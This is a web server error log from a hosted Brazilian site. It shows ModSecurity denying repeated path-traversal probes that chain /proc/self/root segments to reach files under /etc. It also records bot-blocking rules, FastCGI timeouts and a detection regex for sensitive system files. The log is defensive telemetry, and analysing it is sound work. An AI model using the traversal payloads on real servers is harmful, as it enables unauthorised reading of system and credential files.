[Wed Mar 18 01:30:10.406547 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:34276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboqUsdf6f5d65gmYZSBiwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:30:31.105890 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44046] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:30:33.351670 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.244.43:48234] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboqaew_le52K8_3pV2RkwAAAhI"]
[Wed Mar 18 01:30:41.103040 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:34276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboqccdf6f5d65gmYZSBogAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 01:30:53.123573 2026] [proxy_fcgi:error] [pid 19507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44446] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:30:55.284983 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.228.61:50714] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboqfwkwaGbbGflqUZDFmwAAAMY"]
[Wed Mar 18 01:31:15.225805 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44690] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:31:36.129791 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:31:39.607538 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:39310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboqq0zinOy1jxa1j4fDBwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:31:58.151913 2026] [proxy_fcgi:error] [pid 19507:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45400] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:32:20.150130 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45696] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:32:42.130824 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45966] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:33:05.073983 2026] [proxy_fcgi:error] [pid 29882:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46218] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:33:27.048248 2026] [proxy_fcgi:error] [pid 29882:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46452] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:33:49.121248 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46710] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:34:11.033858 2026] [proxy_fcgi:error] [pid 15051:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47012] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:34:33.093353 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47278] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:34:38.177462 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:34120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aborXtY0UrI5A3LftIxB6QAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:34:55.139572 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47540] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:35:02.137313 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:46588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abordtY0UrI5A3LftIxB-AAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:35:03.650405 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:35574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abord-yqAr6etmhZHNppZAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:35:16.128064 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:40590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aborhOyqAr6etmhZHNppfgAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:35:16.812898 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:52274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aborhOyqAr6etmhZHNppfwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 01:35:17.138088 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47858] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:35:33.885737 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.244.43:36652] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aborlSmAPhZkrhU8w4khTAAAAI8"]
[Wed Mar 18 01:35:41.133813 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48236] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:35:56.400708 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.228.61:47974] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aborrCmAPhZkrhU8w4khUAAAAIY"]
[Wed Mar 18 01:36:03.118951 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48516] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:36:25.134785 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48836] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:36:47.122141 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:49120] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:37:01.407011 2026] [mime_magic:error] [pid 31803:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:56374] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/opt/puppetlabs/puppet
[Wed Mar 18 01:37:01.407252 2026] [access_compat:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:56374] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/opt/puppetlabs/puppet
[Wed Mar 18 01:37:08.033846 2026] [proxy_fcgi:error] [pid 15051:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49428] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:37:31.153857 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49768] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:37:54.125824 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50062] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:38:21.145903 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50356] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:38:32.899695 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:40510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abosSAkwaGbbGflqUZDGOgAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:38:42.129523 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50660] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:39:04.136482 2026] [proxy_fcgi:error] [pid 29882:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50998] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:39:26.133866 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51312] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:39:40.876261 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:59280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abosjCmAPhZkrhU8w4khiwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:39:48.121798 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51552] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:40:11.129699 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51866] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:40:33.120361 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52196] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:40:34.977553 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:50630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboswvu8EFLIOrSqIpu63gAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:40:34.985264 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.244.43:50582] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboswtY0UrI5A3LftIxCmQAAAYo"]
[Wed Mar 18 01:40:50.675086 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:54112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abos0sdf6f5d65gmYZSCWAAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:40:55.045845 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52498] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:40:59.743158 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.228.61:44704] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abos2wkwaGbbGflqUZDGhAAAAM4"]
[Wed Mar 18 01:41:17.057110 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52864] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:41:35.972188 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:55222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abos__u8EFLIOrSqIpu7AgAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:41:40.872144 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:58474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abotBOoXxyEfFpUF8f8gOgAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:41:42.096547 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53164] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:41:44.959660 2026] [core:alert] [pid 29882:tid 140411699963648] [client 74.7.243.128:37324] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/include/bits
[Wed Mar 18 01:42:04.125822 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53476] AH01075: Error dispatching request to : (polling)
